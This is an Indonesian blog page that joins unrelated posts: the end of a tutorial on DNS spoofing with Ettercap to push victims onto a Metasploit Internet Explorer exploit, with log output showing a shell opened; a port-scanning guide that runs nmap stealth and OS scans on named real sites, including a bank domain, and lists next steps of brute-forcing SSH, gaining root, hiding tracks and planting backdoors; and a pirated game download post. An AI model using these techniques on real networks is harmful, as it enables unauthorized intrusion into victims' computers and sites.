Setelah itu, jalankan teknik DNS Spoofing, anda bisa menggunakan Ettercap, penulis sudah beberapa kali mengisi seminar tentang DNS Spoofing di tahun 2008 dan 2009. Contohnya penulis mendemokan langsung untuk melakukan hacking windows Vista dengan memanfaatkan celah keamanan browser IE 7 dan DNS Spoofing menggunakan ettercap di suatu mall di Jogja, bahkan apalagi saat ini sudah banyak tutorial tentang cara menggunakan teknik DNS Spoofing menggunakan ettercap di google, sehingga penulis tidak perlu menuliskannya disini.
Disini, penulis asumsikan kita menggunakan ettercap yang penulis set di etter.dns, contoh dimasukkan *.com A
192.168.1.10, save lalu jalankan Spoofingnya, karena celah ini pada keamanan IE, maka korban harus membuka situsnya dengan IE yang punya celah keamanan tersebut. Apapun situs dengan domain .com yang dibuka oleh pengguna windows 7 dengan IE 8 tersebut maka akan langsung diarahkan ke URL komputer penulis yaitu http://192.168.1.10. Setelah dijalankan IP itu di IE maka akan tampill seperti berikut di Metasploit kita.
[*] 192.168.1.10:1884 Received request for “/”
[*] 192.168.1.10:1884 Sending windows/browser/ms11_003_ie_css_import redirect
[*] 192.168.1.10:1884 Received request for “/Gm8zVwl.html”
[*] 192.168.1.10:1884 Sending windows/browser/ms11_003_ie_css_import HTML
[*] Started bind handler
[*] 192.168.1.10:1884 Received request for “/generic-1310601540.dll”
[*] 192.168.1.10:1884 Sending windows/browser/ms11_003_ie_css_import .NET DLL[-] Exception handling request: An existing connection was forcibly closed by the remote host.
[*] 192.168.1.10:1889 Received request for “/\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A”
[*] 192.168.1.10:1889 Sending windows/browser/ms11_003_ie_css_import CSS
[*] Sending stage (240 bytes) to 192.168.1.10
[*] Command shell session 2 opened (192.168.1.10:1890 -> 192.168.1.10:4444) at 2011-07-14 06:59:03 +0700
Binggo, kita mendapatkan shell.
Untuk pengamanan anda dapat update IE anda atau upgrade ke IE 9. Penulis tidak bertanggung jawab segala hal yang diakibatkan tutorial ini.

0
Pahami cara kerja tools scaning port


adakah yang belum tahu mengenai apa itu port ? jika memang ada yang belum tahu, saya akan menjelaskan sedikit tentang apa itu port. Dalam protokol jaringan TCP/IP, sebuah port adalah mekanisme yang mengizinkan sebuah komputer untuk mendukung beberapa sesi koneksi dengan komputer lainnya dan program di dalam jaringan. Port dapat mengidentifikasikan aplikasi dan layanan yang menggunakan koneksi di dalam jaringan TCP/IP. Sehingga, port juga mengidentifikasikan sebuah proses tertentu di mana sebuah server dapat memberikan sebuah layanan kepada klien atau bagaimana sebuah klien dapat mengakses sebuah layanan yang ada dalam server. Port dapat dikenali dengan angka 16-bit (dua byte) yang disebut dengan Port Number dan diklasifikasikan dengan jenis protokol transport apa yang digunakan, ke dalam Port TCP dan Port UDP. Karena memiliki angka 16-bit, maka total maksimum jumlah port untuk setiap protokol transport yang digunakan adalah 65536 buah.
ok kita mulai saja ya bagaimana cara kerja sebuah tools pendeteksi port.

1. Cara kerja port scaning

Yang pertama adalah dengan menggunakan metode yang dinamakan TCP 3 Way Handshake. TCP koneksi akan dicoba dilakukan terhadap target dengan mengirimkan SYN paket, dan apabila Port dalam keadaan terbuka, maka target akan mengembalikan SYN/ACK paket.

Apabila paket RSET atau dalam waktu tertentu tidak diterima jawaban apa-apa, Timeout, maka dapat diambil kesimpulan target port dalam keadaan tertutup. Walaupun sebenarnya, hal ini dapat saja diakibatkan oleh firewall atau filtering lainnya di komputer target.

2. TCP syn scan

Dengan mengirimkan paket RSET sebelum koneksi TCP terjadi, server target tidak sempat mengambil log dari komunikasi waktu scan dilakukan. Apabila port dalam keadaan tertutup, kondisinya sama dengan pada saat TCP Connect Scan.

3. UDP Scan (ICMP Port Unreach)

Metode terakhir di sini adalah dengan menggunakan UDP paket. Port dianggap terbuka apabila tidak ada jawaban dari komputer target Dan, apabila port dalam keadaan tertutup, maka komputer target akan mengirimkan paket ICMP Port Unreachable, seperti terlihat pada gambar. Hanya saja, di beberapa network yang menggunakan firewall atau filtering lainnya, paket ini tidak diteruskan ke luar network.

B. LETS SCAN TARGET !!

disini saya akan menjelaskan port scaning dengan scaner nmap, what is nmap ?? oke buat yang belum tau nmap :

Nmap (“Network Mapper”) merupakan sebuah tool open source untuk eksplorasi dan audit keamanan jaringan. Ia dirancang untuk memeriksa jaringan besar secara cepat, meskipun ia dapat pula bekerja terhadap host tunggal. Nmap menggunakan paket IP raw dalam cara yang canggih untuk menentukan host mana saja yang tersedia pada jaringan, layanan (nama aplikasi dan versi) apa yang diberikan, sistem operasi (dan versinya) apa yang digunakan, apa jenis firewall/filter paket yang digunakan, dan sejumlah karakteristik lainnya. Meskipun Nmap umumnya digunakan untuk audit keamanan, namun banyak administrator sistem dan jaringan menganggapnya berguna untuk tugas rutin seperti inventori jaringan, mengelola jadwal upgrade layanan, dan melakukan monitoring uptime host atau layanan.

meskipun ada yang GUI tapi yang akan saya jelaskan adalah scaning dengan commandline karena itu adalah basicnya..

oke akan saya contohkan 2 target yaitu :
www.hakzsite.us
www.ibank.klikbca.com

# nmap -v -sS -O www.hakzsite.us
Starting Nmap 5.21 ( http://nmap.org ) at 2011-02-13 00:01 SE Asia Standard Time

Initiating Ping Scan at 00:01
Scanning www.hakzsite.us (209.51.196.244) [4 ports]
Completed Ping Scan at 00:01, 0.75s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:01
Completed Parallel DNS resolution of 1 host. at 00:01, 0.33s elapsed
Initiating SYN Stealth Scan at 00:01
Scanning www.hakzsite.us (209.51.196.244) [1000 ports]
Discovered open port 80/tcp on 209.51.196.244
Discovered open port 25/tcp on 209.51.196.244
Discovered open port 443/tcp on 209.51.196.244
Increasing send delay for 209.51.196.244 from 0 to 5 due to 34 out of 111 droppe
d probes since last increase.
Completed SYN Stealth Scan at 00:02, 33.74s elapsed (1000 total ports)
Initiating OS detection (try #1) against www.hakzsite.us (209.51.196.244)
Retrying OS detection (try #2) against www.hakzsite.us (209.51.196.244)
Nmap scan report for www.hakzsite.us (209.51.196.244)
Host is up (0.31s latency).
rDNS record for 209.51.196.244: f4.c4.33.static.xlhost.com
Not shown: 996 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
443/tcp open https
1025/tcp filtered NFS-or-IIS
Device type: WAP|storage-misc|general purpose|firewall
Running (JUST GUESSING) : AVM embedded (94%), Netgear embedded (94%), Linksys em
bedded (94%), Western Digital Linux 2.6.X (89%), Linux 2.6.X (85%), ISS Linux 2.
4.X (85%)
Aggressive OS guesses: AVM FRITZ!Box FON WLAN 7050, Linksys WAG200G, or Netgear
DG834GT wireless broadband router (94%), Western Digital MyBook World Edition 2
NAS device (Linux 2.6.17.14) (89%), Linux 2.6.20-gentoo-r8 (Gentoo, x86, SMP) (8
5%), ISS Proventia GX3002C firewall (Linux 2.4.18) (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 31.393 days (since Wed Jan 12 14:36:20 2011)
TCP Sequence Prediction: Difficulty=205 (Good luck!)
IP ID Sequence Generation: All zeros

Read data files from: C:\Program Files\Nmap
OS detection performed. Please report any incorrect results at http://nmap.org/s
ubmit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.04 seconds

Raw packets sent: 1160 (56.064KB) | Rcvd: 1068 (43.268KB)

Terlihat ada 4 port yang terbuka
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
443/tcp open https
1025/tcp filtered NFS-or-IIS

# nmap -v -sS -O www.ibank.clikbca.com
Starting Nmap 5.21 ( http://nmap.org ) at 2011-02-13 00:07 SE Asia Standard Time

Failed to resolve given hostname/IP: www.ibank.klikbca.com. Note that you can’t
use ‘/mask’ AND ’1-4,7,100-’ style IP ranges
Read data files from: C:\Program Files\Nmap
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 1.46 seconds
Raw packets sent: 0 (0B) | Rcvd: 0 (0B)

ibank.klikbca.com merupakan situs yang palings serius pertahanannya. Bahkan oleh nmap yang melakukan stealth probe gagal untuk melihat port yang aktif di ibank.klikbca.com meskipun ada port yang aktif tapi telah ditutup oleh firewall demi keamanannya.

setelah kita mengetahui apa saja port yang terbuka barulah kita bisa melanjutkan ke tahap berikutnya sesuai port tersebut. ingat kita baru mencapai langkah ke 0 dimana kita berusaha mendapatkan informasi mengenai situs target.
misal port yang terbuka adalah
80/http = kita mulai mencari bug atau vulnerability melalui urlnya misal SQLI, LFI, RFI, dsb
22/ssh = kita bisa mencoba melakukan bruteforce login ssh bila sukses kita jadi ssh tinggal cari exploit localrootnya buat dapetin root access.
dsb.
langkah berikutnya adalah :
Step 1: Memperoleh akses ke situs.

Step 2: Menghack root.

Step 3: Menutupi bekas-bekas anda.

Step 4: Membuat backdoor untuk menjaga account.
Kita baru mencapai Step 0, usaha untuk membuka akses ke situs.
7 Feb 2012
1 Feb 2012

0
Sniper Elite (PC/ENG/Full)


Sniper Elite - Nah sekarang van akan share Game Sniper Elite karena ada sobat yang request Sniper Elite, Sekalian van juga mau share game jadul kaya Sniper Elite ini. Sebelumnya van juga sudah pernah share game Shooter yang mirip dengan Sniper Elite ini yaitu Sniper Ghost Warrior, penasaran bagaimana game jadul Sniper Elite ini simak saja langsung Download Game Sniper Elite di bawah ini cekidott.


(gameplay) Sniper Elite sets you in the midst of the end of World War II. As an OSS-trained sniper you must disguise yourself as a German soldier and stop the Russians from stealing nuclear secrets from Berlin. Through 28 levels, you can use your stealth and sniping skills to take out sentries, machine gun nests, and guard posts. Sniper Elite incorporates elevation, wind speed, posture, background noise, and a host of other factors into the sniping experience. Sniper Elite also includes cooperative and competitive multiplayer modes.


Minimum System Requirements
Operating system: Windows XP/VISTA/7
CPU: Intel Pentium 4 3,2 GHz, Intel Pentium D 2.66 GHz, AMD Athlon 64 3500+
Memory: 1 GB RAM (XP), 2 GB RAM (VISTA/7)
Video Card: 256 MB graphics card, DirectX 10.0 or 9.0c, compatible, Shader Model 3.0 GeForce (6800/7600-7950/8600-8800/9600- 9800/GTX 260-280) or Radeon (X1650-1950/HD 2400-2900/3650-3870/4650-4870)
Hard Drive: 6,5 GB of free hard drive space
Sound card compatible with DirectX 9.0c
DVD-ROM, mouse, keyboard

Ads 468x60px

I
 
. | © Copyright 2011 - 2013 by Lucky Preira | Supported by Universitas Satya Negara Indonesia & DX LabeLs